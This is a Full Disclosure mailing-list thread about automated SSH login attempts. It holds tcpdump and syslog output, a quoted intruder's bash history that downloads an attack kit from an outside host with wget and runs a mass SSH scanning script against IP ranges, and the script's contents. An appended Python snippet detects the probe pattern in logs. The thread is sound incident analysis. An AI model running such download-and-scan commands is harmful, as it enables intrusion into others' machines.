Full Disclosure mailing list archives

Re: Re: Automated SSH login attempts?


From: Andrei Galca-Vasiliu <andrei () fq ro>
Date: Thu, 29 Jul 2004 22:44:20 +0300

I've tested the exploit on my Slack 10 box, OpenSSH_3.8.1p1, from my machine.
The tcpdump output follows:

tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
22:38:56.177625 IP (tos 0x0, ttl  61, id 64319, offset 0, flags [DF], length: 
60) 82.77.45.170.35528 > 213.157.171.49.22: S [tcp sum ok] 49755694:49755694
(0) win 5728 <mss 1432,sackOK,timestamp 272157969 0,nop,wscale 0>
22:38:56.190058 IP (tos 0x0, ttl  61, id 64320, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 
5728 <nop,nop,timestamp 272157985 647644964>
22:38:56.239677 IP (tos 0x0, ttl  61, id 64321, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 
5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.239897 IP (tos 0x0, ttl  61, id 64322, offset 0, flags [DF], length: 
72) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 
win 5728 <nop,nop,timestamp 272158015 647644979>
22:38:56.295474 IP (tos 0x0, ttl  61, id 64323, offset 0, flags [DF], length: 
204) 82.77.45.170.35528 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 
<nop,nop,timestamp 272158084 647645031>
22:38:56.347138 IP (tos 0x0, ttl  61, id 64324, offset 0, flags [DF], length: 
196) 82.77.45.170.35528 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 
<nop,nop,timestamp 272158136 647645122>
22:38:56.419528 IP (tos 0x0, ttl  61, id 64325, offset 0, flags [DF], length: 
68) 82.77.45.170.35528 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 
1098 win 7904 <nop,nop,timestamp 272158209 647645166>
22:38:56.476041 IP (tos 0x0, ttl  61, id 64326, offset 0, flags [DF], length: 
104) 82.77.45.170.35528 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 
<nop,nop,timestamp 272158264 647645246>
22:38:56.490631 IP (tos 0x0, ttl  61, id 64327, offset 0, flags [DF], length: 
136) 82.77.45.170.35528 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 
<nop,nop,timestamp 272158278 647645263>
22:38:56.506077 IP (tos 0x0, ttl  61, id 64328, offset 0, flags [DF], length: 
104) 82.77.45.170.35528 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 
<nop,nop,timestamp 272158302 647645285>
22:38:56.506232 IP (tos 0x0, ttl  61, id 64329, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 
1234 win 7904 <nop,nop,timestamp 272158302 647645285>
22:38:56.511642 IP (tos 0x0, ttl  61, id 62364, offset 0, flags [DF], length: 
60) 82.77.45.170.35529 > 213.157.171.49.22: S [tcp sum ok] 53755391:53755391
(0) win 5728 <mss 1432,sackOK,timestamp 272158307 0,nop,wscale 0>
22:38:56.525150 IP (tos 0x0, ttl  61, id 64330, offset 0, flags [DF], length: 
52) 82.77.45.170.35528 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 
1235 win 7904 <nop,nop,timestamp 272158310 647645295>
22:38:56.528352 IP (tos 0x0, ttl  61, id 62365, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 1 win 
5728 <nop,nop,timestamp 272158324 647645298>
22:38:56.538958 IP (tos 0x0, ttl  61, id 62366, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 1:1(0) ack 26 win 
5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.539178 IP (tos 0x0, ttl  61, id 62367, offset 0, flags [DF], length: 
72) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 1:21(20) ack 26 
win 5728 <nop,nop,timestamp 272158333 647645317>
22:38:56.584001 IP (tos 0x0, ttl  61, id 62368, offset 0, flags [DF], length: 
204) 82.77.45.170.35529 > 213.157.171.49.22: P 21:173(152) ack 634 win 6688 
<nop,nop,timestamp 272158363 647645329>
22:38:56.661544 IP (tos 0x0, ttl  61, id 62369, offset 0, flags [DF], length: 
196) 82.77.45.170.35529 > 213.157.171.49.22: P 173:317(144) ack 634 win 6688 
<nop,nop,timestamp 272158452 647645411>
22:38:56.744357 IP (tos 0x0, ttl  61, id 62370, offset 0, flags [DF], length: 
68) 82.77.45.170.35529 > 213.157.171.49.22: P [tcp sum ok] 317:333(16) ack 
1098 win 7904 <nop,nop,timestamp 272158504 647645479>
22:38:56.799022 IP (tos 0x0, ttl  61, id 62371, offset 0, flags [DF], length: 
104) 82.77.45.170.35529 > 213.157.171.49.22: P 333:385(52) ack 1098 win 7904 
<nop,nop,timestamp 272158592 647645571>
22:38:56.811454 IP (tos 0x0, ttl  61, id 62372, offset 0, flags [DF], length: 
136) 82.77.45.170.35529 > 213.157.171.49.22: P 385:469(84) ack 1150 win 7904 
<nop,nop,timestamp 272158601 647645586>
22:38:56.832211 IP (tos 0x0, ttl  61, id 62373, offset 0, flags [DF], length: 
104) 82.77.45.170.35529 > 213.157.171.49.22: P 469:521(52) ack 1234 win 7904 
<nop,nop,timestamp 272158623 647645606>
22:38:56.832365 IP (tos 0x0, ttl  61, id 62374, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: F [tcp sum ok] 521:521(0) ack 
1234 win 7904 <nop,nop,timestamp 272158623 647645606>
22:38:56.850483 IP (tos 0x0, ttl  61, id 62375, offset 0, flags [DF], length: 
52) 82.77.45.170.35529 > 213.157.171.49.22: . [tcp sum ok] 522:522(0) ack 
1235 win 7904 <nop,nop,timestamp 272158638 647645621>

And this is the syslog entry:

Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170
Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 
82.77.45.170 port 35528 ssh2
Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170
Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest 
from 82.77.45.170 port 35529 ssh2

Can anyone figure it out?

In a mail dated Thursday 29 July 2004 19:38, Stefan Janecek wrote:
Hmmm - I have also been getting those login attempts, but thought them to
be harmless. Maybe they are not *that* harmless, though... Today I
managed to get my hands on a machine that was originating such login
attempts. I must admit I am far from being a linux security expert, but
this is what I've found out up to now:

Whoever broke into the machine did not take any attempts to cover up his
tracks - this is what I found in /root/.bash_history:

------
id
uname -a
w
id
ls
wgte frauder.us/linux/ssh.tgz
wget frauder.us/linux/ssh.tgz
tar xzvf ssh.tgz
tar xvf ssh.tgz
ls
cd ssh
ls
./go.sh 195.178
ls
pico uniq.txt
vi uniq.txt
ls
rm -rf uniq.txt
./go.sh 167.205
ls
rm -rf uniq.txt  vuln.txt
./go.sh 202.148.20
./go.sh 212.92
./go.sh 195.197
./go.sh 147.32
./go.sh 213.168
./go.sh 134.176
./go.sh 195.83
------

um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
binaries:

go.sh:
-------
./ss 22 -b $1 -i eth0 -s 6
cat bios.txt |sort | uniq > uniq.txt
./sshf
-------

* 'ss' apparently is some sort of portscanner
* 'sshf' connects to every IP in uniq.txt and tries to log in as user
'test' first, then as user 'guest' (according to tcpdump).

This does not seem to be a stupid brute force attack, as there is only
one login attempt per user. Could it be that the tool tries to exploit
some vulnerability in the sshd, and just tries to look harmless by using
'test' and 'guest' as usernames?

The compromised machine was running an old debian woody installation
which had not been upgraded for at least one year; the sshd version
string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'

As already mentioned, I am far from being an expert, but if I can assist
in further testing, then let me know. Please CC me, I am not subscribed
to the list.

cheers,
Stefan






_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

Andrei Galca-Vasiliu
Folio Q Advertising
www.fq.ro

Security is an illusion...

*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.,_,.-:*'``'*:-.

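The thread's observation that this tool makes exactly one attempt as 'test' and then one as 'guest' per host is itself a usable log signature. As an added example (not code from either poster), the following Python parses sshd "Failed password" lines of the form shown above and separates that one-shot test/guest probe pattern from an ordinary repeated-guess brute force; the log sample is constructed from the posted lines plus a few invented lines for contrast, and the host names, IPs and PIDs in the invented lines are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample: the two sshd lines posted in the thread, plus a
# made-up repeated-guess source and one successful login for contrast.
SAMPLE_LOG = """\
Jul 29 22:38:56 master sshd[29520]: Illegal user test from 82.77.45.170
Jul 29 22:38:56 master sshd[29520]: Failed password for illegal user test from 82.77.45.170 port 35528 ssh2
Jul 29 22:38:56 master sshd[29522]: Illegal user guest from 82.77.45.170
Jul 29 22:38:56 master sshd[29522]: Failed password for illegal user guest from 82.77.45.170 port 35529 ssh2
Jul 29 22:40:01 master sshd[29530]: Failed password for illegal user admin from 10.0.0.5 port 40000 ssh2
Jul 29 22:40:03 master sshd[29531]: Failed password for illegal user admin from 10.0.0.5 port 40001 ssh2
Jul 29 22:40:05 master sshd[29532]: Failed password for illegal user admin from 10.0.0.5 port 40002 ssh2
Jul 29 22:41:00 master sshd[29540]: Accepted publickey for stefan from 192.0.2.10 port 50000 ssh2
"""

# Matches the OpenSSH 3.x "illegal user" wording and the later "invalid user" one.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:illegal|invalid) user (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port (?P<port>\d+) ssh2$"
)

# The sshf tool described in the thread tries 'test' once, then 'guest' once.
SCANNER_USERS = ("test", "guest")


def parse_failures(log_text):
    """Return (timestamp, ip, user, port) for every failed-password line."""
    out = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            out.append((m["ts"], m["ip"], m["user"], int(m["port"])))
    return out


def attempts_by_source(failures):
    """Group failures by source IP: ip -> {username: attempt count}."""
    per_ip = defaultdict(lambda: defaultdict(int))
    for _ts, ip, user, _port in failures:
        per_ip[ip][user] += 1
    return per_ip


def find_sshf_sources(log_text):
    """IPs whose failures are exactly one 'test' and one 'guest' attempt."""
    hits = []
    for ip, users in attempts_by_source(parse_failures(log_text)).items():
        if set(users) == set(SCANNER_USERS) and all(n == 1 for n in users.values()):
            hits.append(ip)
    return sorted(hits)


if __name__ == "__main__":
    for ip in find_sshf_sources(SAMPLE_LOG):
        print(f"one-shot test/guest probe from {ip}")
```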
